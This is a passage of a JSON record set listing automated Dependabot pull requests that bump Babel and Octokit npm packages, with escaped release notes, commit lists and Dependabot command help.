view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/runtime-corejs3` from 7.13.9 to 7.29.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e\u003ccode\u003e@​babel/runtime-corejs3\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.1 (2026-02-04)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17771\"\u003e#17771\u003c/a\u003e [7.x backport] fix: ensure \u003ccode\u003etargets.esmodules\u003c/code\u003e is validated (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17776\"\u003e#17776\u003c/a\u003e [7.x backport] Fix undefined when 64 indents (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 2\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.0 (2026-01-31)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e for your first PR!\u003c/p\u003e\n\u003ch4\u003e:rocket: New Feature\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17750\"\u003e#17750\u003c/a\u003e [7.x backport] Add attributes import declaration builder (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17663\"\u003e#17663\u003c/a\u003e [7.x backport] feat(standalone): export async transform (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17725\"\u003e#17725\u003c/a\u003e [7.x backport] feat: read standalone targets from data-targets (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17765\"\u003e#17765\u003c/a\u003e fix(parser): correctly parse type assertions in \u003ccode\u003eextends\u003c/code\u003e clause (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17723\"\u003e#17723\u003c/a\u003e [7.x backport] fix(parser): improve super type argument parsing (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17708\"\u003e#17708\u003c/a\u003e fix(traverse): provide a hub when traversing a File or Program and no parentPath is given (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-block-scoping\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17737\"\u003e#17737\u003c/a\u003e [7.x backport] fix: Rename switch discriminant references when body creates shadowing variable (\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:running_woman: Performance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e, \u003ccode\u003ebabel-runtime-corejs3\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17642\"\u003e#17642\u003c/a\u003e [Babel 7] Improve generator performance (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 6\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eDavid (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.28.6 (2026-01-12)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/kadhirash\"\u003e\u003ccode\u003e@​kadhirash\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/kolvian\"\u003e\u003ccode\u003e@​kolvian\u003c/code\u003e\u003c/a\u003e for your first PRs!\u003c/p\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-cli\u003c/code\u003e, \u003ccode\u003ebabel-code-frame\u003c/code\u003e, \u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-helper-check-duplicate-nodes\u003c/code\u003e, \u003ccode\u003ebabel-helper-fixtures\u003c/code\u003e, \u003ccode\u003ebabel-helper-plugin-utils\u003c/code\u003e, \u003ccode\u003ebabel-node\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-flow-comments\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-modules-commonjs\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-property-mutators\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e, \u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17589\"\u003e#17589\u003c/a\u003e Improve Unicode handling in code-frame tokenizer (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/37d5595fca9f188f0534458180611f2e776acd31\"\u003e\u003ccode\u003e37d5595\u003c/code\u003e\u003c/a\u003e v7.29.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/1c0a08d95ae7e1c788c7e1ae3a10ee53f7c86864\"\u003e\u003ccode\u003e1c0a08d\u003c/code\u003e\u003c/a\u003e [7.x backport] fix: Properly handle await in finally (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-runtime-corejs3/issues/17805\"\u003e#17805\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/0053db620c05acf0036f593b5aaf4e372daa79d0\"\u003e\u003ccode\u003e0053db6\u003c/code\u003e\u003c/a\u003e Update polyfill packages (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-runtime-corejs3/issues/17727\"\u003e#17727\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/68e157771568abc3ba8b2775caf7618cd9692ae5\"\u003e\u003ccode\u003e68e1577\u003c/code\u003e\u003c/a\u003e [Babel 7] Improve generator performance (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-runtime-corejs3/issues/17642\"\u003e#17642\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/d7f400889567ae18ef9ac41b024b5120f6060e17\"\u003e\u003ccode\u003ed7f4008\u003c/code\u003e\u003c/a\u003e v7.28.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/35055e392079a65830b7bf5b1d1c1fc4de90a78f\"\u003e\u003ccode\u003e35055e3\u003c/code\u003e\u003c/a\u003e v7.28.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/18d88b83c67c8dbbe63e4ac423e6006c4c01b85c\"\u003e\u003ccode\u003e18d88b8\u003c/code\u003e\u003c/a\u003e Improve \u003ccode\u003e@​babel/core\u003c/code\u003e typings (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-runtime-corejs3/issues/17471\"\u003e#17471\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/ef155f5ca83c73dbc1ea8d95216830b7dc3b0ac2\"\u003e\u003ccode\u003eef155f5\u003c/code\u003e\u003c/a\u003e v7.28.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/cac0ff4c3426eed30b4d27e7971b348da7c9f1e6\"\u003e\u003ccode\u003ecac0ff4\u003c/code\u003e\u003c/a\u003e v7.28.2\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/babel/babel/commi...\n\n_Description has been truncated_","html_url":"https://github.com/iDereje/badges/pull/10","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/iDereje%2Fbadges/issues/10","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/10/packages"},{"uuid":"4088095634","node_id":"PR_kwDOKoENhM7LNEnS","number":4,"state":"closed","title":"Bump @octokit/plugin-paginate-rest from 9.1.2 to 9.2.2","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-03-17T14:31:28.000Z","author_association":null,"state_reason":null,"created_at":"2026-03-17T11:59:57.000Z","updated_at":"2026-03-17T14:31:30.000Z","time_to_close":9091,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"@octokit/plugin-paginate-rest","old_version":"9.1.2","new_version":"9.2.2","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"}],"path":null,"ecosystem":"npm"},"body":"Bumps [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) from 9.1.2 to 9.2.2.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev9.2.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003e9.2.2\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003ee1e4489\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev9.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.0...v9.2.1\"\u003e9.2.1\u003c/a\u003e (2024-03-01)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003epkg:\u003c/strong\u003e pin \u003ccode\u003e@octokit/core\u003c/code\u003e peerDependency to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/599\"\u003e#599\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/5b84386830ebfe873f4ab7e106cc33eec6a2ace7\"\u003e5b84386\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev9.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.1.5...v9.2.0\"\u003e9.2.0\u003c/a\u003e (2024-02-22)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003enew \u003ccode\u003e/orgs/{org}/organization-roles/{role_id}/teams\u003c/code\u003e and \u003ccode\u003e/orgs/{org}/organization-roles/{role_id}/users\u003c/code\u003e endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/594\"\u003e#594\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/75aeaafae8b52afe744958075d95111f37343093\"\u003e75aeaaf\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev9.1.5\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.1.4...v9.1.5\"\u003e9.1.5\u003c/a\u003e (2023-12-04)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ebump octokit/types minor version (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/581\"\u003e#581\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/65baec44474875a48ff20c22e109f1a574421dc5\"\u003e65baec4\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev9.1.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.1.3...v9.1.4\"\u003e9.1.4\u003c/a\u003e (2023-11-12)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e bump \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/575\"\u003e#575\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/27db9ae012528921725d929af43111469faff901\"\u003e27db9ae\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev9.1.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.1.2...v9.1.3\"\u003e9.1.3\u003c/a\u003e (2023-11-09)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e bump \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/574\"\u003e#574\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0940cb70e4f7ae86c80f6101c01f2699076bd363\"\u003e0940cb7\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003e\u003ccode\u003ee1e4489\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/5b84386830ebfe873f4ab7e106cc33eec6a2ace7\"\u003e\u003ccode\u003e5b84386\u003c/code\u003e\u003c/a\u003e fix(pkg): pin \u003ccode\u003e@octokit/core\u003c/code\u003e peerDependency to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/599\"\u003e#599\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/fa01f94c624b3b67f6ef687c80865773a1c99676\"\u003e\u003ccode\u003efa01f94\u003c/code\u003e\u003c/a\u003e ci(action): update actions/add-to-project action to v0.6.0 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/598\"\u003e#598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/75aeaafae8b52afe744958075d95111f37343093\"\u003e\u003ccode\u003e75aeaaf\u003c/code\u003e\u003c/a\u003e feat: new \u003ccode\u003e/orgs/{org}/organization-roles/{role_id}/teams\u003c/code\u003e and `/orgs/{org}/o...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/54d6bcfef756e5b329d817ce5ad3f92885a00a7d\"\u003e\u003ccode\u003e54d6bcf\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/1bfa2f8d338158db33af812168bbfad9d8af4f00\"\u003e\u003ccode\u003e1bfa2f8\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency npm-run-all2 to v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/eb4a8fe643a368ef3d68f8901d551638230581e1\"\u003e\u003ccode\u003eeb4a8fe\u003c/code\u003e\u003c/a\u003e chore(deps): replace dependency npm-run-all with npm-run-all2 ^5.0.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/11ef7798c8519e8446a92605d4e4bd2008a42c07\"\u003e\u003ccode\u003e11ef779\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.20.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/2b6cc98c51e0816a2873ea5d6e6b4edb01d2e9b9\"\u003e\u003ccode\u003e2b6cc98\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/d7c9de5bb0366b61666c1270138ce93059c3402a\"\u003e\u003ccode\u003ed7c9de5\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.2.4 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/588\"\u003e#588\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.1.2...v9.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=@octokit/plugin-paginate-rest\u0026package-manager=npm_and_yarn\u0026previous-version=9.1.2\u0026new-version=9.2.2)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/0GiS0/gh-custom-deploy-protection-rules/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/0GiS0/gh-custom-deploy-protection-rules/pull/4","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/0GiS0%2Fgh-custom-deploy-protection-rules/issues/4","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/4/packages"},{"uuid":"4080435781","node_id":"PR_kwDORnycEM7K0V15","number":7,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 1 directory with 4 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":3,"pull_request":true,"closed_at":"2026-03-16T06:09:39.000Z","author_association":null,"state_reason":null,"created_at":"2026-03-16T06:07:16.000Z","updated_at":"2026-03-16T06:09:42.000Z","time_to_close":143,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":4,"packages":[{"name":"@octokit/endpoint","old_version":"9.0.5","new_version":"9.0.6","repository_url":"https://github.com/octokit/endpoint.js"},{"name":"@octokit/plugin-paginate-rest","old_version":"9.2.1","new_version":"9.2.2","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@octokit/request","old_version":"8.4.0","new_version":"8.4.1","repository_url":"https://github.com/octokit/request.js"},{"name":"@octokit/request-error","old_version":"5.1.0","new_version":"5.1.1"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 3 updates in the / directory: [@octokit/endpoint](https://github.com/octokit/endpoint.js), [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) and [@octokit/request](https://github.com/octokit/request.js).\n\nUpdates `@octokit/endpoint` from 9.0.5 to 9.0.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/endpoint.js/releases\"\u003e\u003ccode\u003e@​octokit/endpoint\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev9.0.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/endpoint.js/compare/v9.0.5...v9.0.6\"\u003e9.0.6\u003c/a\u003e (2025-02-14)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/endpoint.js/issues/515\"\u003e#515\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/endpoint.js/commit/599ff4f76534ea2872f40b41c4ffbbcca987d6a5\"\u003e599ff4f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/endpoint.js/commit/599ff4f76534ea2872f40b41c4ffbbcca987d6a5\"\u003e\u003ccode\u003e599ff4f\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/endpoint.js/issues/515\"\u003e#515\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/endpoint.js/compare/v9.0.5...v9.0.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 9.2.1 to 9.2.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev9.2.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003e9.2.2\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003ee1e4489\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003e\u003ccode\u003ee1e4489\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca 